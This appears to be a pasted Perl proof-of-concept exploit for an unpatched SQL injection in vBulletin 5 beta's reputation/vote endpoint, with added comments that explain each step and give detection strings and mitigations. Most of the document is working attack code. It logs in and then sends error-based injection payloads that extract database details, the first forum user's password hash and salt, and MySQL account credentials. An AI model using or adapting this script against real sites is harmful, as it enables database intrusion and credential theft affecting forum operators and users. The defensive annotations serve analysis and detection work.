Googleinurl

vBulletin 5.0.0 Beta 28: 0day

Dec 14th, 2013
#!/usr/bin/perl
###################################################################################
#                                                           Saturday, March 30, 2013
#
#
#
#                    _  _  .__                .__
#                 __| || |_|  |   ____   ____ |__| ____   ____
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
#                       [P]roof [o]f [C]oncept, SQL Injection
#     vBulletin™ is the world leader in forum and community publishing software.
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
# UberLame .......> Provided all proper payloads
# Stealth ........> Thanks ;)
#
###################################################################################
#  SUMMARY     #
################
#
# http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
#
# Database error in vBulletin 5.0.0 Beta 28:
# MySQL Error   : Duplicate entry '#5.1.67#1' for key 'group_key'
# Error Number  : 1062
# Request Date  : Saturday, March 30th 2013 @ 01:13:40 AM
# Error Date    : Saturday, March 30th 2013 @ 01:13:41 AM
# Script        : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
#
################
#  VULNERABLE  #
################
#
#  vBulletin 5 beta [ALL] - http://vbulletin.com
#
################
#  CONFIRMED   #
################
#
#  vBulletin 5 beta 17
#  vBulletin 5 beta 28
#
################
#  CVE         #
################
#
#  There is no CVE reported.
#
################
#  PATCH       #
################
#
#  There is no PATCH available.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Folder, User, Password, Number and the script will
# login and deliver the payload...
#
# [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
#
###################################################################################
#
# What the code below actually does, step by step:
#   1. POSTs the supplied username/password to <host><path>auth/login over plain
#      HTTP (the URLs are all built from a hard-coded 'http://' prefix).
#   2. POSTs a series of crafted `nodeid` values to
#      <host><path>index.php/ajax/api/reputation/vote.
#   3. Scans each response body for text framed by two '#' characters (the 0x23
#      markers that every payload wraps its result in) and prints whatever it
#      finds.  Nothing is validated; the printed values are simply the first
#      '#...#' run in each body.
#
# Notes for a defender triaging this against a deployment:
#   - The script reads its results out of the HTTP response body, so it depends on
#     the server echoing query output / database error text to the client (the
#     SUMMARY block above shows such an error page).  Not returning verbose
#     database errors closes the read-back channel; binding `nodeid` as a
#     parameter (it is a numeric node id) removes the injection itself.
#   - Detection: every request below is a POST to .../ajax/api/reputation/vote
#     whose `nodeid` is not a plain integer and contains the literal substrings
#     `information_schema`, `floor(rand(0)*2)` and, in the last three requests,
#     `mysql.user`.  Those strings can be matched verbatim in access/WAF logs.
#   - The script runs without `use strict` / `use warnings`; $host, $path and the
#     $fix* result holders are unqualified package globals.
#
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
# Clear the terminal; command chosen by OS.
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
###############################################################################
#'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
#..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
#:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
#::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
#:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
#: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
# ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
#........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
###############################################################################
 
[?] Homepage: http://www.zempirians.com
[?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
[?] Effected: vBulletin 5 Beta XX SQLi 0day
[?] Irc Server: irc.zempirians.com +6697
 
";
# Exactly five positional arguments are required (see usage line in the header).
if (@ARGV != 5) {
    print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
    print "\r\n";
    exit;
}
# Positional arguments.  $magicnum is the numeric nodeid every payload is
# prefixed with; $encpath is the base64 of the forum base URL and is sent as
# the 'url' field of the login form below.
$host        = $ARGV[0];
$path        = $ARGV[1];
$username    = $ARGV[2];
$password    = $ARGV[3];
$magicnum    = $ARGV[4];
$encpath     = encode_base64('http://'.$host.$path);

print "\n";
print "[+] Establishing connection and logging in\n";

my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;

# Login request: plain form POST of the supplied credentials to auth/login,
# with a Referer pointing back at the login form.
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

# Attach the cookie jar to the user agent for the requests that follow.
$browser->cookie_jar( $cookie_jar );

# Each request below re-declares "my $response" at file scope; without
# warnings enabled this is silent.  The recurring regex
# /(#((\\.)|[^\\#])*#)/ captures the first '#...#' run in the body; the
# following s/\#//g strips the two marker characters.
print "[+] Send payload [ 1 of 4 ]\n";
# Probe 1a: asks for version(); result read back between the '#' markers.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataA = $response->content;
    if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
                $fixversion = $1;
                $fixversion =~ s/\#//g;
                # Fixed-offset slice of the response body (23 chars from offset
                # 58); presumably the "vBulletin x.y.z Beta NN" fragment of the
                # error page — depends entirely on the page layout, not on the
                # regex above.
                $fixvb = substr($dataA, 58, 23);
    };

# Probe 1b: asks for schema() (current database name); stored in $fixvbdb and
# reused to qualify the <db>.user table in probes 3a–3c.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataAB = $response->content;
        if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbdb = $1;
                $fixvbdb =~ s/\#//g;
        };


# Any of the three values may be undef/empty if the body did not match.
print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
print "\n";

print "[+] Send payload [ 2 of 4 ]\n";
# Probe 2: asks for user() (the account the application connects as).
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataB = $response->content;
    if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
        $fixuserhost = $1;
        $fixuserhost =~ s/\#//g;
        # Only printed when the body matched; otherwise this probe is silent.
        print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
    };
print "\n";

print "[+] Send payload [ 3 of 4 ]\n";

# Probes 3a–3c: first row of <$fixvbdb>.user — username, password, salt.
# $fixvbdb is interpolated into the query text, so if probe 1b matched
# nothing the table reference is malformed and these return no marker run.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataC = $response->content;
        if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbuser = $1;
                $fixvbuser =~ s/\#//g;
    };


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataD = $response->content;
        if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbpass = $1;
                $fixvbpass =~ s/\#//g;
        };


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataE = $response->content;
        if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbsalt = $1;
                $fixvbsalt =~ s/\#//g;
        };


print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
print "\n";

print "[+] Send payload [ 4 of 4 ]\n";

# Probes 4a–4c: first row of mysql.user — user, password, host.  These only
# succeed if the application's database account can read the mysql schema,
# which is itself a least-privilege finding worth checking on the server.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataF = $response->content;
        if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqluser = $1;
                $fixsqluser =~ s/\#//g;
        };

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataG = $response->content;
        if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqlpass = $1;
                $fixsqlpass =~ s/\#//g;
        };

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataH = $response->content;
        if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqlhost = $1;
                $fixsqlhost =~ s/\#//g;
        };


print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';

# Left over from debugging: dumps the raw body of probe 1b when uncommented.
#print "\n\n[?] Error dump - payload 1\n\n";
#print $dataAB;

print "\n\n";

# Exits with status 1 even on the success path.
exit 1;